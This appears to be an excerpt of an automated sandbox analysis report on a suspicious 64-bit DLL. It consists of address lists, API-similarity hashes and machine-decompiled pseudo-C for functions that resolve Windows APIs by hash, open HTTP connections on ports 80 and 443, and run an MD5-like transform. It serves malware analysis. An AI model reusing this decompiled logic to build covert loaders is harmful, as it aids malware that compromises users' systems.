                  0x180003a74
                  0x180003a82
                  0x180003a89
                  0x180003a94
                  0x180003aa2
                  0x180003aa7
                  0x180003aaa
                  0x180003ab2
                  0x180003ab9
                  0x180003ac0
                  0x180003ac3
                  0x180003ac7
                  0x180003acd
                  0x180003ad4
                  0x180003ada
                  0x180003add
                  0x180003ae5
                  0x180003aeb
                  0x180003af2
                  0x180003af8
                  0x180003afc
                  0x180003b03
                  0x180003b09
                  0x180003b0d
                  0x180003b14
                  0x180003b1f
                  0x180003b29
                  0x180003b30
                  0x180003b35
                  0x180003b3d
                  0x180003b42
                  0x180003b48
                  0x180003b4a
                  0x180003b4c
                  0x180003b4f
                  0x180003b56
                  0x180003b61
                  0x180003b69
                  0x180003b75
                  0x180003b77
                  0x180003b7d
                  0x180003b8b
                  0x180003b93
                  0x180003b95
                  0x180003ba0
                  0x180003ba2
                  0x180003ba4
                  0x180003ba7
                  0x180003bae
                  0x180003bb0
                  0x180003bbe
                  0x180003bc3
                  0x180003bca
                  0x180003bcc
                  0x180003bd4
                  0x180003bd6
                  0x180003be0
                  0x180003be5
                  0x180003bec
                  0x180003bf7
                  0x180003bff
                  0x180003c01
                  0x180003c21

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CloseCriticalHandleSection$CreateEvent$DeleteEnterErrorFreeHeapInitializeLastLeaveMutexObjectSingleSleepSwitchThreadWaitmemcpy
                  • String ID:
                  • API String ID: 810493412-0
                  • Opcode ID: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction ID: da56e0963138b123f8a3a91eab94b9da458cf35c37d31fe2a2e97a6efbfc397b
                  • Opcode Fuzzy Hash: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction Fuzzy Hash: 5F51C332301B4882EB97DF22A4117DA73A8FB8CBD8F448524AE5D47795EF38CA09C350
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E00000001180002B60(void* __esi, void* __rcx, void* __r9, void* __r10, signed long long __r11) {
                  				void* __rbx;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t79;
                  				signed int _t94;
                  				void* _t143;
                  				void* _t144;
                  				long long _t174;
                  				long long* _t175;
                  				long long* _t178;
                  				void* _t180;
                  				long long _t182;
                  				void* _t190;
                  				intOrPtr _t211;
                  				void* _t224;
                  				void* _t225;
                  				long long _t228;
                  				void* _t229;
                  				void* _t255;
                  				signed long long _t256;
                  
                  				_t256 = __r11;
                  				_t255 = __r10;
                  				_t144 = __esi;
                  				_t174 = _t228;
                  				_t229 = _t228 - 0x60;
                  				r12d =  *0x8000d498;
                  				 *(_t174 + 0x20) =  *(_t174 + 0x20) & 0x00000000;
                  				_t225 = __rcx;
                  				if (E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x28, __rcx) != 0) goto 0x80002bd9;
                  				_t79 = E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x20, _t225);
                  				if (_t79 == 0) goto 0x80002bd9;
                  				HeapFree(??, ??, ??);
                  				if (_t79 != 0) goto 0x80002f0d;
                  				_t190 = _t229 + 0x48;
                  				if (E00000001180008C60(_t180, _t190, _t224, _t225) != 0) goto 0x80002ed2;
                  				r9d =  *( *((intOrPtr*)(_t225 + 0x40)) + 2) & 0x0000ffff;
                  				if (_t190 - __r9 + 8 <= 0) goto 0x80002c2b;
                  				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x80002c2d;
                  				E00000001180004ED8(r12d ^ 0xe49a1e6d, __r9 +  *((intOrPtr*)(_t225 + 0x40)) + 8);
                  				_t182 = _t174;
                  				goto 0x80002c2d;
                  				if (_t182 == 0) goto 0x80002ec8;
                  				_t21 = _t225 + 0xb0; // 0xb0
                  				 *((long long*)(_t229 + 0x28)) = _t182;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				if (E000000011800022AC(_t182, _t174, _t182, _t21,  *((intOrPtr*)(_t229 + 0x48)), _t225,  *0x8000d490,  *((intOrPtr*)(_t225 + 0x30)),  *((intOrPtr*)(_t225 + 0x38))) != 0) goto 0x80002ec8;
                  				_t175 =  *((intOrPtr*)(_t225 + 0x28));
                  				 *((long long*)(_t229 + 0x40)) = _t175;
                  				if (E00000001180002370(r12d ^ 0x61f25585, _t175, _t182, _t256) != 0) goto 0x80002caf;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)),  *((intOrPtr*)(_t229 + 0x48)), _t229 + 0xa8) == 0) goto 0x80002caf;
                  				goto 0x80002cb8;
                  				 *(_t229 + 0xa8) = 0;
                  				E0000000118000459C(0xab05e147, _t175,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				r15d = 0x7f;
                  				if (_t175 == 0) goto 0x80002cec;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t175();
                  				goto 0x80002cef;
                  				if (r15d != 0x102) goto 0x80002ec8;
                  				 *(_t225 + 0x64) = 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x64d094d6, _t175, _t182, _t256) != 0) goto 0x80002d41;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				r9d = 0;
                  				E00000001180002668(_t175, _t182, _t225, 0x180001844, _t225,  *0x8000d490,  *((intOrPtr*)(_t229 + 0x38)), _t229 + 0xb0);
                  				if (E00000001180002370(r12d ^ 0xdd4632ba, _t175, _t182, _t256) != 0) goto 0x80002d8f;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002d8f;
                  				_t94 =  *(_t229 + 0xa8);
                  				if (_t94 == 0) goto 0x80002d8f;
                  				 *(_t225 + 0x64) = _t94 * 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x705ce798, _t175, _t182, _t256) != 0) goto 0x80002dd2;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002dd2;
                  				goto 0x80002ddb;
                  				 *(_t229 + 0xa8) = 0;
                  				r12d = r12d ^ 0xe5c7ba87;
                  				if (E00000001180002370(r12d, _t175, _t182, _t256) != 0) goto 0x80002e40;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8) == 0) goto 0x80002e40;
                  				GetSystemTimeAsFileTime(??);
                  				r11d =  *((intOrPtr*)(_t229 + 0xb8));
                  				 *((intOrPtr*)(_t225 + 0x60)) = r11d;
                  				_t178 = _t256 * 0x23c34600 +  *((intOrPtr*)(_t229 + 0x50));
                  				 *((long long*)(_t225 + 0x58)) = _t178;
                  				if (E00000001180007DBC(0, E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8), _t225, _t229 + 0x58, _t229 + 0x30) != 0) goto 0x80002e68;
                  				r8d =  *((intOrPtr*)(_t229 + 0x30));
                  				E0000000118000137C(_t144, _t182, _t225,  *((intOrPtr*)(_t229 + 0x58)), _t255);
                  				E0000000118000459C(0xab05e147, _t178,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t178 == 0) goto 0x80002e97;
                  				r8d = 0;
                  				r9d = 0;
                  				r9d = r9d * 0x3e8;
                  				 *_t178();
                  				goto 0x80002e9a;
                  				_t143 = r15d;
                  				if (_t143 != 0) goto 0x80002e40;
                  				if ( *((intOrPtr*)(_t225 + 0x50)) == 0) goto 0x80002ec8;
                  				E00000001180007950(0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *((intOrPtr*)(_t225 + 0x50)), _t224,  *((intOrPtr*)(_t225 + 0x50)),  *0x8000d490);
                  				HeapFree(??, ??, ??);
                  				E00000001180002620();
                  				_t211 =  *0x8000d4a0;
                  				if ( *((intOrPtr*)(_t211 + 0x20)) == 0) goto 0x80002ef8;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t211 + 0x28)) == 0) goto 0x80002f0d;
                  				HeapFree(??, ??, ??);
                  				asm("lock inc ecx");
                  				return _t143;
                  			}
























                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b6d
                  0x180002b7f
                  0x180002b86
                  0x180002b8a
                  0x180002ba9
                  0x180002bb7
                  0x180002bc0
                  0x180002bd3
                  0x180002bdb
                  0x180002be1
                  0x180002bef
                  0x180002bfc
                  0x180002c11
                  0x180002c1a
                  0x180002c21
                  0x180002c26
                  0x180002c29
                  0x180002c30
                  0x180002c43
                  0x180002c4a
                  0x180002c4f
                  0x180002c5d
                  0x180002c63
                  0x180002c80
                  0x180002c8c
                  0x180002ca4
                  0x180002cad
                  0x180002cb1
                  0x180002cc1
                  0x180002cc6
                  0x180002ccf
                  0x180002ce0
                  0x180002ce3
                  0x180002ce6
                  0x180002cea
                  0x180002cf5
                  0x180002d14
                  0x180002d22
                  0x180002d29
                  0x180002d36
                  0x180002d3c
                  0x180002d61
                  0x180002d79
                  0x180002d7b
                  0x180002d84
                  0x180002d8c
                  0x180002daf
                  0x180002dc7
                  0x180002dd0
                  0x180002dd4
                  0x180002ddb
                  0x180002dfc
                  0x180002e14
                  0x180002e1b
                  0x180002e21
                  0x180002e2c
                  0x180002e37
                  0x180002e3c
                  0x180002e54
                  0x180002e56
                  0x180002e63
                  0x180002e71
                  0x180002e79
                  0x180002e7b
                  0x180002e7e
                  0x180002e8a
                  0x180002e91
                  0x180002e95
                  0x180002e97
                  0x180002e9c
                  0x180002ea5
                  0x180002eb5
                  0x180002ec2
                  0x180002ecd
                  0x180002ed2
                  0x180002ee3
                  0x180002eeb
                  0x180002eff
                  0x180002f07
                  0x180002f0d
                  0x180002f23

                  APIs
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                    • Part of subcall function 0000000180002464: FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002BD3
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180002E1B
                  • HeapFree.KERNEL32 ref: 0000000180002EC2
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002EEB
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002F07
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Free$Heap$LibraryTime$FileLoadSystem
                  • String ID:
                  • API String ID: 1415693639-0
                  • Opcode ID: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction ID: d455ad72a2173ea311d53c287058b5208197830efbff1c216518b590d8193917
                  • Opcode Fuzzy Hash: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction Fuzzy Hash: A5A15172204B8996EBA2DB66E4407DA73A5F78D7D4F448022FA4D47A95DF38C64AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800027D4(long long __rbx, intOrPtr* __rcx, void* __rdx) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t100;
                  				long long* _t119;
                  				long long* _t120;
                  				long long* _t121;
                  				long long* _t122;
                  				long long* _t123;
                  				void* _t151;
                  				void* _t152;
                  				intOrPtr* _t153;
                  				void* _t155;
                  				void* _t158;
                  				long long* _t161;
                  				void* _t163;
                  				void* _t164;
                  				long _t176;
                  				void* _t178;
                  				void* _t181;
                  				void* _t184;
                  
                  				_t123 = __rbx;
                  				 *((long long*)(_t163 + 0x10)) = __rbx;
                  				 *(_t163 + 0x18) = r8d;
                  				_t164 = _t163 - 0x50;
                  				_t119 =  *0x8000d4a0;
                  				_t156 =  *__rcx;
                  				_t153 = __rcx;
                  				r15d = r9d;
                  				E00000001180007B04(__rbx, __rdx, __rcx,  *__rcx, _t158, __rdx, _t184, _t181);
                  				if (_t119 == _t123) goto 0x80002a78;
                  				_t100 =  *((char*)(_t153 + 0x75)) - 6;
                  				_t5 = _t123 + 4; // 0x4
                  				r12d = _t5;
                  				if (_t100 > 0) goto 0x8000283e;
                  				if (_t100 != 0) goto 0x80002835;
                  				if ( *((char*)(_t153 + 0x74)) - 2 > 0) goto 0x8000283e;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0;
                  				goto 0x80002846;
                  				 *((intOrPtr*)(_t164 + 0x90)) = r12d;
                  				E0000000118000459C(0x3fe3c8ba, _t119,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t119 == _t123) goto 0x80002871;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((intOrPtr*)(_t164 + 0x20)) = 0;
                  				 *_t119();
                  				goto 0x80002874;
                  				_t120 = _t123;
                  				 *((long long*)(_t153 + 0x28)) = _t120;
                  				HeapFree(_t178, _t176, _t152);
                  				if ( *((intOrPtr*)(_t153 + 0x28)) == _t123) goto 0x80002a78;
                  				if ( *((intOrPtr*)(_t164 + 0xa0)) == 0) goto 0x800028ce;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x800028c4;
                  				_t17 = _t164 + 0xa0; // 0x12
                  				r9d = r12d;
                  				 *_t120();
                  				goto 0x800028c6;
                  				if (0 == 0) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 8)), _t153, _t156, _t119, _t17, _t155, _t158);
                  				if (_t120 == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0x100;
                  				if ( *((intOrPtr*)(_t164 + 0xb0)) == 0) goto 0x80002938;
                  				 *((intOrPtr*)(_t164 + 0x40)) = 0xaa0;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002927;
                  				r9d = r12d;
                  				 *_t120();
                  				asm("bts dword [esp+0x90], 0x17");
                  				r12d = 0x1bb;
                  				goto 0x8000293e;
                  				r12d = 0x50;
                  				E0000000118000459C(0x7dda0345, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002963;
                  				r9d = 0;
                  				r8d = r12w & 0xffffffff;
                  				 *_t120();
                  				goto 0x80002966;
                  				_t121 = _t123;
                  				 *((long long*)(_t153 + 0x30)) = _t121;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x30)) == _t123) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 0x10)), _t153, _t156, _t120, _t120);
                  				_t161 = _t121;
                  				if (_t121 == _t123) goto 0x80002a78;
                  				E0000000118000459C(0xaa9d9fc1, _t121,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t121 == _t123) goto 0x800029ed;
                  				_t151 =  !=  ?  *0x8000d490 + 0x180011260 :  *0x8000d490 + 0x180011278;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t164 + 0x30)) =  *((intOrPtr*)(_t164 + 0x90));
                  				 *((long long*)(_t164 + 0x28)) = _t123;
                  				 *((long long*)(_t164 + 0x20)) = _t123;
                  				 *_t121();
                  				goto 0x800029f0;
                  				_t122 = _t123;
                  				 *((long long*)(_t153 + 0x38)) = _t122;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x38)) == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x44)) = 4;
                  				E0000000118000459C(0x677ec78c, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				_t45 = _t161 + 0x1b; // 0x1f
                  				r12d = _t45;
                  				if (_t122 == _t123) goto 0x80002a40;
                  				 *_t122();
                  				goto 0x80002a42;
                  				if (0 == 0) goto 0x80002a80;
                  				asm("bts dword [esp+0x90], 0x8");
                  				E0000000118000459C(0xe7f09937, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t122 == _t123) goto 0x80002a80;
                  				r9d = 4;
                  				 *_t122();
                  				goto 0x80002a80;
                  				return GetLastError();
                  			}
























                  0x1800027d4
                  0x1800027d4
                  0x1800027d9
                  0x1800027e9
                  0x1800027ed
                  0x1800027f4
                  0x180002805
                  0x18000280d
                  0x180002810
                  0x18000281d
                  0x180002823
                  0x180002827
                  0x180002827
                  0x18000282b
                  0x18000282d
                  0x180002833
                  0x180002835
                  0x18000283c
                  0x18000283e
                  0x18000284f
                  0x180002857
                  0x180002860
                  0x180002863
                  0x180002869
                  0x18000286d
                  0x18000286f
                  0x180002871
                  0x18000287c
                  0x180002880
                  0x18000288a
                  0x180002897
                  0x1800028a2
                  0x1800028aa
                  0x1800028b0
                  0x1800028b8
                  0x1800028c0
                  0x1800028c2
                  0x1800028c8
                  0x1800028d4
                  0x1800028df
                  0x1800028e5
                  0x1800028f7
                  0x180002902
                  0x18000290a
                  0x180002912
                  0x18000291d
                  0x180002925
                  0x180002927
                  0x180002930
                  0x180002936
                  0x180002938
                  0x180002947
                  0x18000294f
                  0x180002955
                  0x180002958
                  0x18000295f
                  0x180002961
                  0x180002963
                  0x18000296e
                  0x180002972
                  0x18000297c
                  0x180002988
                  0x18000298d
                  0x180002993
                  0x1800029a2
                  0x1800029aa
                  0x1800029c9
                  0x1800029d4
                  0x1800029d7
                  0x1800029df
                  0x1800029e4
                  0x1800029e9
                  0x1800029eb
                  0x1800029ed
                  0x1800029f8
                  0x1800029fc
                  0x180002a06
                  0x180002a12
                  0x180002a1a
                  0x180002a1f
                  0x180002a1f
                  0x180002a26
                  0x180002a3c
                  0x180002a3e
                  0x180002a44
                  0x180002a46
                  0x180002a58
                  0x180002a60
                  0x180002a6e
                  0x180002a74
                  0x180002a76
                  0x180002a99

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocErrorLastlstrlenmemset
                  • String ID: P
                  • API String ID: 1242601240-3110715001
                  • Opcode ID: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction ID: b9b39858d45b2fed8cd52d627653eb03beea5c07a2efbf285fd96505e9c46d20
                  • Opcode Fuzzy Hash: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction Fuzzy Hash: E2718B7230468897EBA2DF62A8443DA73A0F78DBC4F488425AF4E47B46CF38D658C710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 000000018000958C: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001800090B2), ref: 0000000180009595
                    • Part of subcall function 000000018000958C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001800090B2), ref: 00000001800095A7
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000461B
                  • LeaveCriticalSection.KERNEL32 ref: 0000000180004653
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalSectionTime$EnterFileLeaveSleepSystem
                  • String ID:
                  • API String ID: 1722460308-0
                  • Opcode ID: 2dd8831bc9f43de6d569c4ecde058db3d0dea22e16b3234fabfd63794af3f721
                  • Instruction ID: 4ead8fb80c48ce341bb99ce9a75b77310841507c5221c0524d6be850b07dbd1f
                  • Opcode Fuzzy Hash: 2dd8831bc9f43de6d569c4ecde058db3d0dea22e16b3234fabfd63794af3f721
                  • Instruction Fuzzy Hash: 08017933718A8497D796CF21E0503DA77A0F799B84F885012EB8947A55DF38DAB9C740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 56%
                  			E00000001180009C54(void* __eflags, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r9, void* __r10, void* __r11, void* _a8, long long _a16, intOrPtr _a24) {
                  				void* _v60;
                  				void* _v64;
                  				intOrPtr _v68;
                  				void* _v72;
                  				void* _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				void* _v88;
                  				intOrPtr _v92;
                  				void* _v96;
                  				intOrPtr _v100;
                  				void* _v104;
                  				void* _v108;
                  				void* _v112;
                  				intOrPtr _v116;
                  				intOrPtr _t385;
                  				signed int _t388;
                  				signed int _t567;
                  				signed int _t596;
                  				signed char* _t610;
                  				signed char* _t611;
                  				void* _t612;
                  				void* _t613;
                  				signed int* _t616;
                  				signed int* _t617;
                  				void* _t619;
                  				intOrPtr* _t620;
                  
                  				_a16 = __rbx;
                  				_a8 = __rcx;
                  				r10d =  *(__rcx + 4);
                  				r11d =  *((intOrPtr*)(__rcx + 8));
                  				_a24 =  *((intOrPtr*)(__rcx));
                  				_t610 = __rdx + 2;
                  				_t616 = _t613 - 0x40;
                  				r9d = 0x10;
                  				_t611 =  &(_t610[4]);
                  				 *_t616 = (((_t610[1] & 0x000000ff) << 0x00000008 |  *_t610 & 0x000000ff) << 0x00000008 |  *(_t611 - 5) & 0x000000ff) << 0x00000008 |  *(_t611 - 6) & 0x000000ff;
                  				_t617 =  &(_t616[1]);
                  				_t619 = __r9 - 1;
                  				if (__eflags != 0) goto 0x80009c8f;
                  				r15d = _v100;
                  				r12d = _v92;
                  				asm("rol edx, 0x7");
                  				r8d = __rcx + __rbx - 0x173848aa;
                  				asm("inc ecx");
                  				r8d = r8d + __rcx + _t612 - 0x28955b88 + r10d;
                  				r9d = __rcx + __r11 + 0x242070db;
                  				asm("inc ecx");
                  				r9d = r9d + r8d;
                  				r10d = __rcx + __r10 - 0x3e423112;
                  				asm("inc ecx");
                  				r10d = r10d + r9d;
                  				r11d = __rcx + _t611 - 0xa83f051;
                  				asm("inc ecx");
                  				r11d = r11d + r10d;
                  				asm("rol edx, 0xc");
                  				r8d = __rcx + _t619 - 0x57cfb9ed;
                  				asm("inc ecx");
                  				r8d = r8d + __rcx +  &(_t617[0x11e1f18a]) + r11d;
                  				r9d = __rcx + __r10 - 0x2b96aff;
                  				asm("inc ecx");
                  				r13d = _v80;
                  				r14d = _v68;
                  				r9d = r9d + r8d;
                  				r10d = __rcx + __r11 + 0x698098d8;
                  				asm("inc ecx");
                  				r10d = r10d + r9d;
                  				asm("rol edx, 0xc");
                  				asm("ror edi, 0xf");
                  				r9d = __rcx + _t619 - 0x76a32842;
                  				asm("inc ecx");
                  				r9d = r9d + __rcx + _t617 - 0xa44f + __rcx + _t611 - 0x74bb0851 + r10d;
                  				r11d = __rcx + __r10 + 0x6b901122;
                  				asm("inc ecx");
                  				r11d = r11d + r9d;
                  				asm("rol ebx, 0xc");
                  				_t388 = __rcx + _t611 - 0x2678e6d + r11d;
                  				r8d = _t388;
                  				r8d =  !r8d;
                  				r10d = __rcx + _t612 - 0x5986bc72;
                  				asm("inc ecx");
                  				r10d = r10d + _t388;
                  				r8d = r8d & r10d;
                  				r9d = __rcx + _t619 + 0x49b40821;
                  				asm("inc ecx");
                  				r9d = r9d + r10d;
                  				r8d = r8d | _t388 & r9d;
                  				r8d = r8d + _v116;
                  				r11d = _t617 + __r11 - 0x9e1da9e;
                  				asm("inc ecx");
                  				r11d = r11d + r9d;
                  				r8d =  &(_t611[__rbx - 0x3fbf4cc0]);
                  				asm("inc ecx");
                  				r8d = r8d + r11d;
                  				asm("rol edx, 0xe");
                  				r10d = __rcx + _t619 - 0x16493856;
                  				asm("inc ecx");
                  				r10d = r10d + __rcx + __r10 + 0x265e5a51 + r8d;
                  				r9d = __rcx + __r11 - 0x29d0efa3;
                  				asm("inc ecx");
                  				r9d = r9d + r10d;
                  				r11d = __rcx +  &(_t617[0x910514]);
                  				asm("inc ecx");
                  				r11d = r11d + r9d;
                  				r8d = __rcx + _t611 - 0x275e197f;
                  				asm("inc ecx");
                  				r8d = r8d + r11d;
                  				asm("ror edx, 0xc");
                  				r10d = __rcx + _t619 + 0x21e1cde6;
                  				asm("inc ecx");
                  				r10d = r10d + __rcx + __r10 - 0x182c0438 + r8d;
                  				r9d = __rcx + __r11 - 0x3cc8f82a;
                  				asm("inc ecx");
                  				r9d = r9d + r10d;
                  				r11d = __rcx + _t617 - 0xb2af279;
                  				asm("inc ecx");
                  				r11d = r11d + r9d;
                  				asm("ror ebx, 0xc");
                  				asm("rol edx, 0x5");
                  				r8d = __rcx + _t619 - 0x3105c08;
                  				asm("inc ecx");
                  				r8d = r8d + __rcx + __r10 - 0x561c16fb + __rcx +  &(_t611[0x455a14ed]) + r11d;
                  				r9d = __rcx + __r11 + 0x676f02d9;
                  				asm("inc ecx");
                  				r9d = r9d + r8d;
                  				r10d = __rcx + __rbx - 0x72d5b376;
                  				asm("inc ecx");
                  				r10d = r10d + r9d;
                  				asm("rol edx, 0x4");
                  				r8d = __rax + _t617 - 0x788e097f;
                  				asm("inc ecx");
                  				r8d = r8d + __rax + _t611 - 0x5c6be + r10d;
                  				r9d = __rax + _t619 + 0x6d9d6122;
                  				asm("inc ecx");
                  				r9d = r9d + r8d;
                  				r10d = __rax + __r10 - 0x21ac7f4;
                  				asm("inc ecx");
                  				r10d = r10d + r9d;
                  				r11d = __rcx + _t611 - 0x5b4115bc;
                  				asm("inc ecx");
                  				r11d = r11d + r10d;
                  				asm("rol edx, 0xb");
                  				r8d = __rax + _t619 - 0x944b4a0;
                  				asm("inc ecx");
                  				r8d = r8d + __rax +  &(_t617[0x12f7b3ea]) + r11d;
                  				r9d = __rax + __r10 - 0x41404390;
                  				asm("inc ecx");
                  				r9d = r9d + r8d;
                  				r10d = __rcx + __r11 + 0x289b7ec6;
                  				asm("inc ecx");
                  				r10d = r10d + r9d;
                  				r11d = __rax + _t611 - 0x155ed806;
                  				asm("inc ecx");
                  				r11d = r11d + r10d;
                  				r8d = __rax + _t617 - 0x2b10cf7b;
                  				asm("inc ecx");
                  				r8d = r8d + r11d;
                  				asm("ror edx, 0x9");
                  				r9d = __rcx + __r10 - 0x262b2fc7;
                  				asm("inc ecx");
                  				r9d = r9d + __rax + _t619 + 0x4881d05 + r8d;
                  				asm("rol ecx, 0xb");
                  				r10d = __rax +  &(_t617[0x7e89f3e]);
                  				asm("inc ecx");
                  				r10d = r10d + __rax + __r11 - 0x1924661b + r9d;
                  				r8d = __rax + _t611 - 0x3b53a99b;
                  				asm("inc ecx");
                  				r8d = r8d + r10d;
                  				asm("rol edx, 0x6");
                  				r9d = __rax + __rcx + 0x432aff97;
                  				asm("inc ecx");
                  				r9d = r9d + __rax + _t619 - 0xbd6ddbc + r8d;
                  				asm("rol ecx, 0xf");
                  				r10d = __rax + _t617 - 0x36c5fc7;
                  				asm("inc ecx");
                  				r10d = r10d + __rax + __r10 - 0x546bdc59 + r9d;
                  				r8d = __rax +  &(_t611[0x655b59c3]);
                  				asm("inc ecx");
                  				r8d = r8d + r10d;
                  				asm("rol edx, 0xa");
                  				r9d = __rax + __rcx - 0x100b83;
                  				asm("inc ecx");
                  				r9d = r9d + __rax + _t619 - 0x70f3336e + r8d;
                  				asm("ror ecx, 0xb");
                  				r10d = __rax +  &(_t617[0x1bea1f93]);
                  				asm("inc ecx");
                  				r10d = r10d + __rax + __r10 - 0x7a7ba22f + r9d;
                  				r11d = __rax + _t611 - 0x1d31920;
                  				asm("inc ecx");
                  				r11d = r11d + r10d;
                  				r9d = __rax + _t619 - 0x5cfebcec;
                  				asm("inc ecx");
                  				r9d = r9d + r11d;
                  				asm("ror ebx, 0xb");
                  				r8d = __rax + __r10 - 0x8ac817e;
                  				asm("inc ecx");
                  				r8d = r8d + __rax + __rcx + 0x4e0811a1 + r9d;
                  				asm("rol edx, 0xa");
